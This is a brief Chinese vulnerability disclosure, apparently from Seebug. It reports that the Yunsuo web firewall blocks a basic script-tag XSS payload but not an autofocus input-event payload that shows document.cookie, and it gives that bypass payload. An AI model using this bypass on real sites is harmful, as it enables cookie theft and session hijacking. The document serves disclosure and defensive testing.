### 简要描述:
这次出现在XSS防护上遗漏
### 详细说明:
正常的脚本`<script>alert(1)</script>`云锁可以有效防护,如下:
[<img src="https://images.seebug.org/upload/201412/3117503549c6e03588f425fa0c762d01c90ccf9b.jpg" alt="x1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/3117503549c6e03588f425fa0c762d01c90ccf9b.jpg)
### 漏洞证明:
通过使用下面这个脚本:`<input onfocus=alert(document.cookie) autofocus>` 成功绕过并弹cookie
[<img src="https://images.seebug.org/upload/201412/3117504572e1db97d3ecdd2dcbdf2ada439418b1.jpg" alt="x.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/3117504572e1db97d3ecdd2dcbdf2ada439418b1.jpg)
暂无评论